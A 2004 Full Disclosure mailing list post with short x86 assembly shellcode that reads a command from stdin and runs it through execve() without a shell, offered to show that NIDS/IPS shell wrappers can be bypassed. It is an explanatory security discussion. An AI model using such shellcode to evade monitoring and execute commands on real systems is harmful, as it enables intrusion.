Full Disclosure mailing list archives

Re: No shell => secure?
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 9 Jul 2004 16:01:46 -0300 (ART)

Hello Sirs!

We don't need a shell. A shellcode uses system calls,
and the shellcode can be the shell.

See the following code:

-------------- noshell.s --------------
# Assembly example that simulates a shell.
# Without using any shell, it is the shell. :)
# Nash Leon - nashleon () yahoo com br
# Note: it only handles a filename of exactly 7 bytes.

# read(0, buf, 20): buf lives just below %esp
xorl %ebx, %ebx          # fd 0 = stdin
movl $3, %eax            # sys_read
leal -20(%esp),%ecx      # buf = %esp - 20
movl $20, %edx           # count = 20 bytes
int $0x80

# Build the execve() arguments in place, inside buf
pushl %ecx
popl   %esi              # %esi = buf (read() left it in %ecx)
movl   %esi,0x8(%esi)    # buf+8  : argv[0] = buf
movb   $0x0,0x7(%esi)    # buf[7] = NUL, terminating the 7-byte path
movl   $0x0,0xc(%esi)    # buf+12 : argv[1] = NULL
movl   $0xb,%eax         # sys_execve
movl   %esi,%ebx         # filename = buf
leal   0x8(%esi),%ecx    # argv = buf+8
#leal   0xc(%esi),%edx   # alternative: envp = pointer to the NULL at buf+12
movl $0x0, %edx          # envp = NULL
int    $0x80

# exit(0), only reached if execve() failed
movl $0x1, %eax          # sys_exit
xorl %ebx, %ebx          # status 0
int $0x80

This source uses read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that it is possible to create
a shellcode that executes commands without
using a shell (/bin/bash, sh, zsh, tcsh, etc.).

It is useful when a NIDS/IPS interacts with
a shell wrapper, waiting for a string on the
interface, capturing an attack.

In this sample only 7 bytes are permitted
as the path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.o
ld: warning: cannot find entry symbol _start;
defaulting to 

$ ./noshell
noshell  noshell.o  noshell.s

So, Sirs, a shell is not necessary to exploit
a system. NIDS/IPS can use a wrapper on the system
call execve() for security, but it is still possible
to break this resource.

Sorry for my poor English.

Best Regards,

Martin Fallon.
Clube dos Mercenarios


Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
